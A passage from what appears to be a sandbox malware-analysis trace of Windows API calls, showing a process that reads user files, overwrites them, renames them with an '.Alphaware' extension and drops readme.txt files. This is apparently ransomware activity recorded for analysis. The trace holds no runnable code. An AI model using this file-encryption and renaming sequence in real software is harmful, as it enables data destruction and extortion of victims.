ftLastWriteTime.dwLowDateTime=0x2868d050, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0093.747] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0093.747] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0093.747] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.748] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.748] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2868d050, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2868d050, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2868d050, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0093.748] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0093.748] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.748] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.770] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.770] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x2b413510, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0093.770] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b3ed3b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b3ed3b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b3ed3b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0093.770] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.770] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.771] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat", dwFileAttributes=0x80) returned 1 [0093.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.773] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x2431cf8 | out: lpFileInformation=0x2431cf8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2b413510, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x1c)) returned 1 [0093.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.774] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.774] GetFileType (hFile=0x250) returned 0x1 [0093.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.774] GetFileType (hFile=0x250) returned 0x1 [0093.774] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x1c [0093.775] ReadFile (in: hFile=0x250, lpBuffer=0x2431fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2431fc8*, lpNumberOfBytesRead=0x23e958*=0x1c, lpOverlapped=0x0) returned 1 [0093.776] CloseHandle (hObject=0x250) returned 1 [0093.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.802] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.803] GetFileType (hFile=0x250) returned 0x1 [0093.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.803] GetFileType (hFile=0x250) returned 0x1 [0093.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b413510, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a1b0bc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf4)) returned 1 [0093.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.805] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.alphaware")) returned 1 [0093.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0093.806] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.806] GetFileType (hFile=0x250) returned 0x1 [0093.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0093.807] GetFileType (hFile=0x250) returned 0x1 [0093.808] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK", dwFileAttributes=0x80) returned 1 [0093.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.809] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b49c0 | out: lpFileInformation=0x24b49c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2b3ed3b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b3ed3b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b3ed3b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x451)) returned 1 [0093.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.809] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.809] GetFileType (hFile=0x250) returned 0x1 [0093.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.809] GetFileType (hFile=0x250) returned 0x1 [0093.809] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x451 [0093.810] ReadFile (in: hFile=0x250, lpBuffer=0x24b50e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b50e8*, lpNumberOfBytesRead=0x23e958*=0x451, lpOverlapped=0x0) returned 1 [0093.811] CloseHandle (hObject=0x250) returned 1 [0093.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.828] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.829] GetFileType (hFile=0x250) returned 0x1 [0093.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.829] GetFileType (hFile=0x250) returned 0x1 [0093.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.831] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3ed3b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b3ed3b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a1fce80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6a0)) returned 1 [0093.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.831] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.alphaware")) returned 1 [0093.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.831] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x8a1fce80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a1fce80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.832] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b413510, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a1b0bc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.Alphaware", cAlternateFileName="INDEXD~1.ALP")) returned 1 [0093.832] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a1d6d20, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a1d6d20, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a1d6d20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0093.832] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3ed3b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b3ed3b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a1fce80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK.Alphaware", cAlternateFileName="TEMPLA~1.ALP")) returned 1 [0093.832] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3ed3b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b3ed3b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a1fce80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK.Alphaware", cAlternateFileName="TEMPLA~1.ALP")) returned 0 [0093.832] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.833] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.833] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53aa4cd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x53aa4cd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a502870, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0093.833] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a907d30, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x93e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0093.833] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.833] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.833] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", dwFileAttributes=0x80) returned 1 [0093.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0093.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), fInfoLevelId=0x0, lpFileInformation=0x2539718 | out: lpFileInformation=0x2539718*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a907d30, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x93e)) returned 1 [0093.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0093.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0093.837] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.837] GetFileType (hFile=0x250) returned 0x1 [0093.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0093.837] GetFileType (hFile=0x250) returned 0x1 [0093.837] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x93e [0093.837] ReadFile (in: hFile=0x250, lpBuffer=0x253a2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x253a2f8*, lpNumberOfBytesRead=0x23e9f8*=0x93e, lpOverlapped=0x0) returned 1 [0093.839] CloseHandle (hObject=0x250) returned 1 [0093.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0093.856] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.857] GetFileType (hFile=0x250) returned 0x1 [0093.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0093.857] GetFileType (hFile=0x250) returned 0x1 [0093.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0093.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8a249140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd20)) returned 1 [0093.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0093.858] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.alphaware")) returned 1 [0093.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e908) returned 1 [0093.859] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\outlook\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.859] GetFileType (hFile=0x250) returned 0x1 [0093.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e878) returned 1 [0093.859] GetFileType (hFile=0x250) returned 0x1 [0093.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.861] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x8a249140, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a249140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.861] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53aa4cd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x53aa4cd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a502870, 